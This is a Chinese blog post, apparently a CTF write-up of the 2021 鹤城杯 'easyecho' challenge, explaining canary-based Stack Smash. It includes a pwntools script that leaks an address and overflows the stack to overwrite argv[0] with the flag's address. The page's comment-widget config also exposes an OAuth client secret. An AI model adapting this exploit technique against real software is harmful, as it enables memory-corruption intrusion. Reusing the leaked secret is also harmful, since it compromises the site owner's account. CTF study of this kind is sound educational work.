<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover">
<meta name="theme-color" content="#f3f1ee">
<title>[2021 鹤城杯] easyecho 栈溢出与 Stack Smash 利用复现 · Misaki</title>
<meta name="description" content="记录 2021 鹤城杯 easyecho pwn 题的 Canary 机制、Stack Smash 思路、libc argv[0] 覆盖与 flag 输出利用流程。">
<link rel="icon" type="image/x-icon" href="/img/favicon.ico">
<link rel="stylesheet" href="/css/style.css">
<meta name="generator" content="Hexo 8.1.2"></head>

<body class="is-article">
  <div class="progress" aria-hidden="true"><span id="progressBar"></span></div>
  <header class="site-nav">
  <a class="brand" href="/">
    <img class="brand-mark" src="/img/favicon.ico" alt="" aria-hidden="true">
    <span class="brand-name">Misaki</span>
  </a>
  <nav class="nav-links" aria-label="主导航">
    
    <a href="/">文章</a>
    
    <a href="/archives/">归档</a>
    
    <a href="/friends/">友链</a>
    
    <a href="/about/">关于</a>
    
  </nav>
  <button class="nav-toggle" id="navToggle" aria-label="展开菜单" aria-expanded="false" aria-controls="mobileMenu">≡</button>
</header>
<nav class="mobile-menu" id="mobileMenu" aria-label="移动端导航" hidden>
  
  <a href="/">文章</a>
  
  <a href="/archives/">归档</a>
  
  <a href="/friends/">友链</a>
  
  <a href="/about/">关于</a>
  
</nav>

  <main id="main">
    

<header class="post-cover">
  <img class="post-bg-img" src="/img/mist.jpg" alt="" aria-hidden="true">
  <div class="post-info">
    <p class="cover-meta">
      <span>2025.10.27</span>
      <span>6 MIN READ</span>
      
      <span>pwn</span>
      
    </p>
    <h1 class="post-title">[2021 鹤城杯] easyecho 栈溢出与 Stack Smash 利用复现</h1>
    
    <p class="cover-tags">
      
      <a href="/tags/stack-overflow/">#stack-overflow</a>
      
      <a href="/tags/pwn/">#pwn</a>
      
      <a href="/tags/CTF/">#CTF</a>
      
      <a href="/tags/canary/">#canary</a>
      
      <a href="/tags/libc/">#libc</a>
      
    </p>
    
  </div>
</header>

<section class="article-wrap">
  <article class="post-card">
    <div class="prose">
      <h1 id="Stack-Smash"><a href="#Stack-Smash" class="headerlink" title="Stack Smash"></a><font style="color:rgb(34, 34, 38);">Stack Smash</font></h1><p>Canary保护，是在栈上插入一段随机数；进入函数后，也就是call完后会有push ebp，mov ebp，esp，最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次，canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。</p>
<p>Stack Smash 就是利用 canary 检测的机制漏洞将栈上的__libc_argv[0] 内容将其输出</p>
<h3 id="注意在libc2-23-后此机制无法使用"><a href="#注意在libc2-23-后此机制无法使用" class="headerlink" title="注意在libc2.23 后此机制无法使用"></a>注意在libc2.23 后此机制无法使用</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __attribute__ ((<span class="keyword">noreturn</span>)) __stack_chk_fail (<span class="type">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">  __fortify_fail (<span class="string">&quot;stack smashing detected&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">void</span> __attribute__ ((<span class="keyword">noreturn</span>)) internal_function __fortify_fail (<span class="type">const</span> <span class="type">char</span> *msg)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">/* The loop is added only to keep gcc happy.  */</span></span><br><span class="line">  <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">    __libc_message (<span class="number">2</span>, <span class="string">&quot;*** %s ***: %s terminated\n&quot;</span>,</span><br><span class="line">                    msg, __libc_argv[<span class="number">0</span>] ?: <span class="string">&quot;&lt;unknown&gt;&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<p><img src="https://misakiimg.oss-cn-shanghai.aliyuncs.com/img/%5B2021%20%E9%B9%A4%E5%9F%8E%E6%9D%AF%5Deasyecho_0.png"></p>
<p><img src="https://misakiimg.oss-cn-shanghai.aliyuncs.com/img/%5B2021%20%E9%B9%A4%E5%9F%8E%E6%9D%AF%5Deasyecho_1.png"></p>
<p>程序大致内容就是输入用户名 name 并且输出出来，当后续输入backdoor 调用p_sub_CF0-&gt;sub_CF0，打开 flag 文件，将其内容存入 bss 段</p>
<p>后续我们只需要将_libc_argv[0] 内容修改为 flag_bss 的地址，我们就可以通过报错信息输出 flag 了</p>
<p>我们现在的流程就是 获取真实地址计算出 flag 的地址，计算到__libc_argv[0] 的偏移</p>
<p><img src="https://misakiimg.oss-cn-shanghai.aliyuncs.com/img/%5B2021%20%E9%B9%A4%E5%9F%8E%E6%9D%AF%5Deasyecho_2.png"></p>
<p>我们可以利用输入 name 的函数输出栈上其他地址算出程序的基地址</p>
<p><img src="https://misakiimg.oss-cn-shanghai.aliyuncs.com/img/%5B2021%20%E9%B9%A4%E5%9F%8E%E6%9D%AF%5Deasyecho_3.png"></p>
<p>由于本地换 libc 上去程序直接崩了，这边看了别的师傅的 wp，输入点 gets 到到__libc_argv[0] 的偏移为 0x168</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">from pwn import * #引用pwntools库</span><br><span class="line">from ctypes import *</span><br><span class="line">from LibcSearcher import *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">misaki=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> misaki:</span><br><span class="line">    context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">    </span><br><span class="line">ming=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> ming:</span><br><span class="line">    p=remote(<span class="string">&#x27;node7.anna.nssctf.cn&#x27;</span>,<span class="number">28194</span>)#配置远程连接#node7.anna.nssctf.cn:<span class="number">28194</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p=process(<span class="string">&quot;./pwn&quot;</span>)#配置本地连接:</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">s = lambda data : p.send(data)</span><br><span class="line">sa  = lambda text,data  :p.sendafter(text, data)</span><br><span class="line">sl  = lambda data   :p.sendline(data)</span><br><span class="line">sla = lambda text,data  :p.sendlineafter(text, data)</span><br><span class="line">r   = lambda num=<span class="number">4096</span>   :p.recv(num)</span><br><span class="line">rl  = lambda text   :p.recvuntil(text)</span><br><span class="line">def m(): gdb.attach(p)</span><br><span class="line"></span><br><span class="line">elf=ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&quot;./libc.so.6&quot;</span>)</span><br><span class="line">#############################################################################################<span class="meta">#</span></span><br><span class="line"><span class="meta">rl(b<span class="string">&#x27;name~&#x27;</span>)</span></span><br><span class="line">s(b<span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span>)</span><br><span class="line">m()</span><br><span class="line">rl(b<span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span>)</span><br><span class="line">addr=u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,b<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">print(f<span class="string">&#x27;addr=&#123;hex(addr)&#125;&#x27;</span>)</span><br><span class="line">base_addr=addr<span class="number">-0xcf0</span></span><br><span class="line">print(f<span class="number">&#x27;b</span>ase_addr=&#123;hex(base_addr)&#125;<span class="string">&#x27;)</span></span><br><span class="line"><span class="string">flag_addr=0x202040+base_addr</span></span><br><span class="line"><span class="string">payload=b&#x27;</span>a<span class="string">&#x27;*0x168+p64(base_addr+0x202040)</span></span><br><span class="line"><span class="string">argv0=0x7ffddc003588</span></span><br><span class="line"><span class="string">v10=0x7ffddc003420</span></span><br><span class="line"><span class="string">padding=(argv0-v10)*b&#x27;</span>b&#x27;</span><br><span class="line">sla(b<span class="string">&#x27;Input: &#x27;</span>,b<span class="number">&#x27;b</span>ackdoor\x00<span class="string">&#x27;)</span></span><br><span class="line"><span class="string">sla(b&#x27;</span>Input: <span class="string">&#x27;,padding+p64(flag_addr))</span></span><br><span class="line"><span class="string">sla(b&#x27;</span>Input: <span class="string">&#x27;,b&#x27;</span>exitexit<span class="string">&#x27;)</span></span><br><span class="line"><span class="string">p.interactive()#与程序交互</span></span><br></pre></td></tr></table></figure>




    </div>
    


<section class="comments" id="comments">
  <p class="comments-head">留言 / COMMENTS</p>
  <div id="gitalk-container" data-id="b0d9806f"></div>
</section>
<script id="gitalk-config" type="application/json">{"clientID":"Ov23liSxI0efH8ZaJdPa","clientSecret":"626893ebd9698d26df631cfd3fac4181f3722297","repo":"text1","owner":"xxianxiayubanmian","admin":["xxianxiayubanmian"],"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","id":"b0d9806f"}</script>
<link rel="stylesheet" href="/plugins/gitalk.min.css">
<script src="/plugins/gitalk.min.js" defer></script>



  </article>

  <aside class="aside-col">
    <div class="aside-sticky">
      
      <nav class="toc" aria-label="目录">
        <p>目录 / INDEX</p>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Stack-Smash"><span class="toc-text">Stack Smash</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E6%84%8F%E5%9C%A8libc2-23-%E5%90%8E%E6%AD%A4%E6%9C%BA%E5%88%B6%E6%97%A0%E6%B3%95%E4%BD%BF%E7%94%A8"><span class="toc-text">注意在libc2.23 后此机制无法使用</span></a></li></ol></li></ol>
      </nav>
      
      <a class="back-link" href="/">← 返回时间线</a>
    </div>
  </aside>
</section>

<nav class="pager" aria-label="文章导航">
  
  <a class="pager-item" href="/posts/cve-2018-5767-tenda-ac15-stack-overflow/">
    <span>上一篇 · PREV</span>
    <strong>CVE-2018-5767 Tenda AC15 栈溢出漏洞复现</strong>
  </a>
  
  
  <a class="pager-item pager-next" href="/posts/tcache-perthread-struct-heap-exploitation/">
    <span>下一篇 · NEXT</span>
    <strong>tcache_perthread_struct 结构体原理与堆利用示例</strong>
  </a>
  
</nav>

  </main>
  <footer class="site-footer">
  <a class="brand brand-light" href="/">
    <img class="brand-mark" src="/img/favicon.ico" alt="" aria-hidden="true">
    <span class="brand-name">Misaki</span>
  </a>
  <p class="foot-motto">Ars longa, vita brevis — Art is long, life is fleeting.</p>
  <p class="foot-meta">
    © 2026 Misaki
    · Powered by <a href="https://hexo.io/" target="_blank" rel="noreferrer">Hexo</a>
    · Theme <b>Mistline</b>
  </p>
</footer>

  <button class="to-top" id="toTop" aria-label="返回顶部" title="返回顶部">↑</button>
  <button class="toc-fab" id="tocFab" aria-label="打开目录" title="目录" hidden>☰</button>
  <script src="/js/main.js" defer></script>
</body>
</html>
